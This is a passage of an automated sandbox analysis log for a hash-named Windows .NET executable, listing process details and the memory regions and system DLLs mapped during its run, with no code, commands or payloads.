# Flog Txt Version 1 # Analyzer Version: 4.6.0 # Analyzer Build Date: Jul 8 2022 06:26:21 # Log Creation Date: 05.08.2022 08:17:15.311 Process: id = "1" image_name = "08b3772f35997a0eb0894e7e58b4a324324de6121f557976909bdaa31a2c883e.exe" filename = "c:\\users\\rdhj0cnfevzx\\desktop\\08b3772f35997a0eb0894e7e58b4a324324de6121f557976909bdaa31a2c883e.exe" page_root = "0x147a9000" os_pid = "0x139c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "analysis_target" parent_id = "0" os_parent_pid = "0x7b4" cmd_line = "\"C:\\Users\\RDhJ0CNFevzX\\Desktop\\08b3772f35997a0eb0894e7e58b4a324324de6121f557976909bdaa31a2c883e.exe\" " cur_dir = "C:\\Users\\RDhJ0CNFevzX\\Desktop\\" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000fa87" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 117 start_va = 0x10000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 118 start_va = 0x30000 end_va = 0x31fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 119 start_va = 0x40000 end_va = 0x54fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 120 start_va = 0x60000 end_va = 0x9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000060000" filename = "" Region: id = 121 start_va = 0xa0000 end_va = 0x19ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000a0000" filename = "" Region: id = 122 start_va = 0x1a0000 end_va = 0x1a3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001a0000" filename = "" Region: id = 123 start_va = 0x1b0000 end_va = 0x1b1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001b0000" filename = "" Region: id = 124 start_va = 0x200000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 125 start_va = 0x400000 end_va = 0x577fff monitored = 1 entry_point = 0x573c12 region_type = mapped_file name = "08b3772f35997a0eb0894e7e58b4a324324de6121f557976909bdaa31a2c883e.exe" filename = "\\Users\\RDhJ0CNFevzX\\Desktop\\08b3772f35997a0eb0894e7e58b4a324324de6121f557976909bdaa31a2c883e.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\08b3772f35997a0eb0894e7e58b4a324324de6121f557976909bdaa31a2c883e.exe") Region: id = 126 start_va = 0x771d0000 end_va = 0x7734afff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 127 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 128 start_va = 0xfffb0000 end_va = 0xfffd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000fffb0000" filename = "" Region: id = 129 start_va = 0xfffe0000 end_va = 0x7ffa1676ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000fffe0000" filename = "" Region: id = 130 start_va = 0x7ffa16770000 end_va = 0x7ffa16930fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 131 start_va = 0x7ffa16931000 end_va = 0x7ffffffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ffa16931000" filename = "" Region: id = 270 start_va = 0x580000 end_va = 0x5effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 271 start_va = 0x640d0000 end_va = 0x6411ffff monitored = 0 entry_point = 0x640e8180 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 272 start_va = 0x64050000 end_va = 0x640c9fff monitored = 0 entry_point = 0x64063290 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 273 start_va = 0x76720000 end_va = 0x767fffff monitored = 0 entry_point = 0x76733980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 274 start_va = 0x64120000 end_va = 0x64127fff monitored = 0 entry_point = 0x641217c0 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 275 start_va = 0x5f0000 end_va = 0x71ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005f0000" filename = "" Region: id = 276 start_va = 0x6f8b0000 end_va = 0x6f908fff monitored = 1 entry_point = 0x6f8c0780 region_type = mapped_file name = "mscoree.dll" filename = "\\Windows\\SysWOW64\\mscoree.dll" (normalized: "c:\\windows\\syswow64\\mscoree.dll") Region: id = 277 start_va = 0x76720000 end_va = 0x767fffff monitored = 0 entry_point = 0x76733980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 278 start_va = 0x76910000 end_va = 0x76a8dfff monitored = 0 entry_point = 0x769c1b90 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 279 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 280 start_va = 0xffeb0000 end_va = 0xfffaffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000ffeb0000" filename = "" Region: id = 281 start_va = 0x720000 end_va = 0x7ddfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 282 start_va = 0x7e0000 end_va = 0x99ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000007e0000" filename = "" Region: id = 283 start_va = 0x7fff0000 end_va = 0x7fffffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 284 start_va = 0x80000000 end_va = 0x8000ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000080000000" filename = "" Region: id = 285 start_va = 0x73e50000 end_va = 0x73ee1fff monitored = 0 entry_point = 0x73e90380 region_type = mapped_file name = "apphelp.dll" filename = "\\Windows\\SysWOW64\\apphelp.dll" (normalized: "c:\\windows\\syswow64\\apphelp.dll") Region: id = 286 start_va = 0xffb00000 end_va = 0xffea0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sysmain.sdb" filename = "\\Windows\\AppPatch\\sysmain.sdb" (normalized: "c:\\windows\\apppatch\\sysmain.sdb") Region: id = 287 start_va = 0x20000 end_va = 0x23fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 288 start_va = 0x76600000 end_va = 0x7667afff monitored = 0 entry_point = 0x7661e970 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 289 start_va = 0x76a90000 end_va = 0x76b4dfff monitored = 0 entry_point = 0x76ac5630 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 290 start_va = 0x1c0000 end_va = 0x1fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 291 start_va = 0x7e0000 end_va = 0x8dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000007e0000" filename = "" Region: id = 292 start_va = 0x990000 end_va = 0x99ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000990000" filename = "" Region: id = 293 start_va = 0x76cb0000 end_va = 0x76cf3fff monitored = 0 entry_point = 0x76cc9d80 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 294 start_va = 0x76c00000 end_va = 0x76cacfff monitored = 0 entry_point = 0x76c14f00 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 295 start_va = 0x73f00000 end_va = 0x73f1dfff monitored = 0 entry_point = 0x73f0b640 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 296 start_va = 0x73ef0000 end_va = 0x73ef9fff monitored = 0 entry_point = 0x73ef2a00 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 297 start_va = 0x76840000 end_va = 0x76897fff monitored = 0 entry_point = 0x768825c0 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 298 start_va = 0x9a0000 end_va = 0xaaffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000009a0000" filename = "" Region: id = 299 start_va = 0x6f910000 end_va = 0x6f98cfff monitored = 1 entry_point = 0x6f920db0 region_type = mapped_file name = "mscoreei.dll" filename = "\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscoreei.dll" (normalized: "c:\\windows\\microsoft.net\\framework\\v4.0.30319\\mscoreei.dll") Region: id = 300 start_va = 0x76d00000 end_va = 0x76d44fff monitored = 0 entry_point = 0x76d1de90 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\SysWOW64\\shlwapi.dll" (normalized: "c:\\windows\\syswow64\\shlwapi.dll") Region: id = 301 start_va = 0x762b0000 end_va = 0x7646cfff monitored = 0 entry_point = 0x76392a10 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\SysWOW64\\combase.dll" (normalized: "c:\\windows\\syswow64\\combase.dll") Region: id = 302 start_va = 0x74ab0000 end_va = 0x74bfefff monitored = 0 entry_point = 0x74b66820 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 303 start_va = 0x743d0000 end_va = 0x74516fff monitored = 0 entry_point = 0x743e1cf0 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 304 start_va = 0x580000 end_va = 0x5a9fff monitored = 0 entry_point = 0x585680 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 305 start_va = 0x5e0000 end_va = 0x5effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005e0000" filename = "" Region: id = 306 start_va = 0xab0000 end_va = 0xc37fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ab0000" filename = "" Region: id = 307 start_va = 0x741b0000 end_va = 0x741dafff monitored = 0 entry_point = 0x741b5680 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 308 start_va = 0x30000 end_va = 0x30fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 309 start_va = 0x580000 end_va = 0x580fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 310 start_va = 0xc40000 end_va = 0xdc0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000c40000" filename = "" Region: id = 311 start_va = 0xdd0000 end_va = 0x21cffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000dd0000" filename = "" Region: id = 312 start_va = 0x21d0000 end_va = 0x2342fff monitored = 1 entry_point = 0x2343c12 region_type = mapped_file name = "08b3772f35997a0eb0894e7e58b4a324324de6121f557976909bdaa31a2c883e.exe" filename = "\\Users\\RDhJ0CNFevzX\\Desktop\\08b3772f35997a0eb0894e7e58b4a324324de6121f557976909bdaa31a2c883e.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\08b3772f35997a0eb0894e7e58b4a324324de6121f557976909bdaa31a2c883e.exe") Region: id = 313 start_va = 0x76d50000 end_va = 0x76d5bfff monitored = 0 entry_point = 0x76d53930 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\SysWOW64\\kernel.appcore.dll" (normalized: "c:\\windows\\syswow64\\kernel.appcore.dll") Region: id = 314 start_va = 0x6f8a0000 end_va = 0x6f8a7fff monitored = 0 entry_point = 0x6f8a17b0 region_type = mapped_file name = "version.dll" filename = "\\Windows\\SysWOW64\\version.dll" (normalized: "c:\\windows\\syswow64\\version.dll") Region: id = 315 start_va = 0x6f1b0000 end_va = 0x6f890fff monitored = 1 entry_point = 0x6f1dcd70 region_type = mapped_file name = "clr.dll" filename = "\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\clr.dll" (normalized: "c:\\windows\\microsoft.net\\framework\\v4.0.30319\\clr.dll") Region: id = 316 start_va = 0x6f0b0000 end_va = 0x6f1a4fff monitored = 0 entry_point = 0x6f104160 region_type = mapped_file name = "msvcr120_clr0400.dll" filename = "\\Windows\\SysWOW64\\msvcr120_clr0400.dll" (normalized: "c:\\windows\\syswow64\\msvcr120_clr0400.dll") Region: id = 317 start_va = 0x590000 end_va = 0x590fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000590000" filename = "" Region: id = 318 start_va = 0x5a0000 end_va = 0x5affff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005a0000" filename = "" Region: id = 319 start_va = 0x5b0000 end_va = 0x5bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005b0000" filename = "" Region: id = 320 start_va = 0x5c0000 end_va = 0x5cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005c0000" filename = "" Region: id = 321 start_va = 0x5d0000 end_va = 0x5dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005d0000" filename = "" Region: id = 322 start_va = 0x5f0000 end_va = 0x5fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005f0000" filename = "" Region: id = 323 start_va = 0x620000 end_va = 0x71ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000620000" filename = "" Region: id = 324 start_va = 0x600000 end_va = 0x60ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000600000" filename = "" Region: id = 325 start_va = 0x610000 end_va = 0x610fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000610000" filename = "" Region: id = 326 start_va = 0x8e0000 end_va = 0x8e0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000008e0000" filename = "" Region: id = 327 start_va = 0x21d0000 end_va = 0x233ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000021d0000" filename = "" Region: id = 328 start_va = 0x8f0000 end_va = 0x96ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000008f0000" filename = "" Region: id = 329 start_va = 0x8f0000 end_va = 0x92ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000008f0000" filename = "" Region: id = 330 start_va = 0x960000 end_va = 0x96ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000960000" filename = "" Region: id = 331 start_va = 0x9a0000 end_va = 0xa9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000009a0000" filename = "" Region: id = 332 start_va = 0xaa0000 end_va = 0xaaffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000aa0000" filename = "" Region: id = 333 start_va = 0x930000 end_va = 0x93ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000930000" filename = "" Region: id = 334 start_va = 0x2340000 end_va = 0x433ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002340000" filename = "" Region: id = 335 start_va = 0x21d0000 end_va = 0x226ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000021d0000" filename = "" Region: id = 336 start_va = 0x2330000 end_va = 0x233ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002330000" filename = "" Region: id = 337 start_va = 0x2270000 end_va = 0x22affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002270000" filename = "" Region: id = 338 start_va = 0x4340000 end_va = 0x443ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004340000" filename = "" Region: id = 339 start_va = 0x4440000 end_va = 0x4776fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 340 start_va = 0x6d400000 end_va = 0x6e6b1fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "mscorlib.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v4.0.30319_32\\mscorlib\\7582400666d289c016013ad0f6e0e3e6\\mscorlib.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\mscorlib\\7582400666d289c016013ad0f6e0e3e6\\mscorlib.ni.dll") Region: id = 341 start_va = 0x74dc0000 end_va = 0x74eaafff monitored = 0 entry_point = 0x74dfd650 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\SysWOW64\\ole32.dll" (normalized: "c:\\windows\\syswow64\\ole32.dll") Region: id = 342 start_va = 0x4780000 end_va = 0x4810fff monitored = 0 entry_point = 0x47b8cf0 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\SysWOW64\\oleaut32.dll" (normalized: "c:\\windows\\syswow64\\oleaut32.dll") Region: id = 343 start_va = 0x930000 end_va = 0x93ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000930000" filename = "" Region: id = 344 start_va = 0x6f030000 end_va = 0x6f0affff monitored = 1 entry_point = 0x6f031180 region_type = mapped_file name = "clrjit.dll" filename = "\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\clrjit.dll" (normalized: "c:\\windows\\microsoft.net\\framework\\v4.0.30319\\clrjit.dll") Region: id = 345 start_va = 0x76680000 end_va = 0x76711fff monitored = 0 entry_point = 0x766b8cf0 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\SysWOW64\\oleaut32.dll" (normalized: "c:\\windows\\syswow64\\oleaut32.dll") Region: id = 346 start_va = 0x940000 end_va = 0x94ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000940000" filename = "" Region: id = 347 start_va = 0x6ca30000 end_va = 0x6d3fbfff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "system.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v4.0.30319_32\\System\\1be7a15b1f33bf22e4f53aaf45518c77\\System.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\system\\1be7a15b1f33bf22e4f53aaf45518c77\\system.ni.dll") Region: id = 348 start_va = 0x6e900000 end_va = 0x6f020fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "system.core.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v4.0.30319_32\\System.Core\\eb4cca4f06a15158c3f7e2c56516729b\\System.Core.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\system.core\\eb4cca4f06a15158c3f7e2c56516729b\\system.core.ni.dll") Region: id = 349 start_va = 0x950000 end_va = 0x95ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000950000" filename = "" Region: id = 350 start_va = 0x22b0000 end_va = 0x2313fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000022b0000" filename = "" Region: id = 351 start_va = 0x4780000 end_va = 0x47e1fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "mscorrc.dll" filename = "\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorrc.dll" (normalized: "c:\\windows\\microsoft.net\\framework\\v4.0.30319\\mscorrc.dll") Region: id = 352 start_va = 0x47f0000 end_va = 0x48affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000047f0000" filename = "" Region: id = 353 start_va = 0x970000 end_va = 0x97ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000970000" filename = "" Region: id = 354 start_va = 0x970000 end_va = 0x97ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000970000" filename = "" Region: id = 355 start_va = 0x970000 end_va = 0x97ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000970000" filename = "" Region: id = 356 start_va = 0x970000 end_va = 0x97ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000970000" filename = "" Region: id = 357 start_va = 0x980000 end_va = 0x98ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000980000" filename = "" Region: id = 358 start_va = 0x2320000 end_va = 0x232ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002320000" filename = "" Region: id = 359 start_va = 0x47f0000 end_va = 0x47fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000047f0000" filename = "" Region: id = 360 start_va = 0x48a0000 end_va = 0x48affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000048a0000" filename = "" Region: id = 361 start_va = 0x980000 end_va = 0x98ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000980000" filename = "" Region: id = 362 start_va = 0x980000 end_va = 0x98ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000980000" filename = "" Region: id = 363 start_va = 0x980000 end_va = 0x98ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000980000" filename = "" Region: id = 364 start_va = 0x980000 end_va = 0x98ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000980000" filename = "" Region: id = 365 start_va = 0x980000 end_va = 0x98ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000980000" filename = "" Region: id = 366 start_va = 0x980000 end_va = 0x98ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000980000" filename = "" Region: id = 367 start_va = 0x980000 end_va = 0x98ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000980000" filename = "" Region: id = 368 start_va = 0x2320000 end_va = 0x232ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002320000" filename = "" Region: id = 369 start_va = 0x980000 end_va = 0x98ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000980000" filename = "" Region: id = 370 start_va = 0x980000 end_va = 0x98ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000980000" filename = "" Region: id = 371 start_va = 0x980000 end_va = 0x98ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000980000" filename = "" Region: id = 372 start_va = 0x980000 end_va = 0x98ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000980000" filename = "" Region: id = 373 start_va = 0x980000 end_va = 0x98ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000980000" filename = "" Region: id = 374 start_va = 0x980000 end_va = 0x98ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000980000" filename = "" Region: id = 375 start_va = 0x2320000 end_va = 0x232ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002320000" filename = "" Region: id = 376 start_va = 0x2320000 end_va = 0x232ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002320000" filename = "" Region: id = 377 start_va = 0x2320000 end_va = 0x232ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002320000" filename = "" Region: id = 378 start_va = 0x47f0000 end_va = 0x47fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000047f0000" filename = "" Region: id = 379 start_va = 0x2320000 end_va = 0x232ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002320000" filename = "" Region: id = 380 start_va = 0x2320000 end_va = 0x232ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002320000" filename = "" Region: id = 381 start_va = 0x47f0000 end_va = 0x47fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000047f0000" filename = "" Region: id = 382 start_va = 0x4800000 end_va = 0x480ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004800000" filename = "" Region: id = 383 start_va = 0x4810000 end_va = 0x484ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004810000" filename = "" Region: id = 384 start_va = 0x48b0000 end_va = 0x49affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000048b0000" filename = "" Region: id = 385 start_va = 0x2320000 end_va = 0x232ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002320000" filename = "" Region: id = 386 start_va = 0x47f0000 end_va = 0x47fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000047f0000" filename = "" Region: id = 387 start_va = 0x4850000 end_va = 0x485ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004850000" filename = "" Region: id = 388 start_va = 0x2320000 end_va = 0x232ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002320000" filename = "" Region: id = 389 start_va = 0x49b0000 end_va = 0x59affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000049b0000" filename = "" Region: id = 390 start_va = 0x59b0000 end_va = 0x5adffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000059b0000" filename = "" Region: id = 391 start_va = 0x5ae0000 end_va = 0x6adffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005ae0000" filename = "" Region: id = 392 start_va = 0x6ae0000 end_va = 0x6d2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006ae0000" filename = "" Region: id = 393 start_va = 0x2320000 end_va = 0x232ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002320000" filename = "" Region: id = 394 start_va = 0x2320000 end_va = 0x232ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002320000" filename = "" Region: id = 395 start_va = 0x2320000 end_va = 0x232ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002320000" filename = "" Region: id = 396 start_va = 0x6e8f0000 end_va = 0x6e8fcfff monitored = 0 entry_point = 0x6e8f63e0 region_type = mapped_file name = "amsi.dll" filename = "\\Windows\\SysWOW64\\amsi.dll" (normalized: "c:\\windows\\syswow64\\amsi.dll") Region: id = 397 start_va = 0x2320000 end_va = 0x232ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002320000" filename = "" Region: id = 398 start_va = 0x2320000 end_va = 0x232ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002320000" filename = "" Region: id = 399 start_va = 0x764d0000 end_va = 0x764d5fff monitored = 0 entry_point = 0x764d1460 region_type = mapped_file name = "psapi.dll" filename = "\\Windows\\SysWOW64\\psapi.dll" (normalized: "c:\\windows\\syswow64\\psapi.dll") Region: id = 400 start_va = 0x6d30000 end_va = 0x6e2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006d30000" filename = "" Region: id = 401 start_va = 0x71560000 end_va = 0x7157afff monitored = 0 entry_point = 0x71569050 region_type = mapped_file name = "bcrypt.dll" filename = "\\Windows\\SysWOW64\\bcrypt.dll" (normalized: "c:\\windows\\syswow64\\bcrypt.dll") Region: id = 402 start_va = 0xffe60000 end_va = 0xffeaffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000ffe60000" filename = "" Region: id = 403 start_va = 0xffe50000 end_va = 0xffe5ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000ffe50000" filename = "" Region: id = 404 start_va = 0x74eb0000 end_va = 0x762aefff monitored = 0 entry_point = 0x7506b990 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\SysWOW64\\shell32.dll" (normalized: "c:\\windows\\syswow64\\shell32.dll") Region: id = 405 start_va = 0x76800000 end_va = 0x76836fff monitored = 0 entry_point = 0x76803b50 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\SysWOW64\\cfgmgr32.dll" (normalized: "c:\\windows\\syswow64\\cfgmgr32.dll") Region: id = 406 start_va = 0x745b0000 end_va = 0x74aa8fff monitored = 0 entry_point = 0x747b7610 region_type = mapped_file name = "windows.storage.dll" filename = "\\Windows\\SysWOW64\\windows.storage.dll" (normalized: 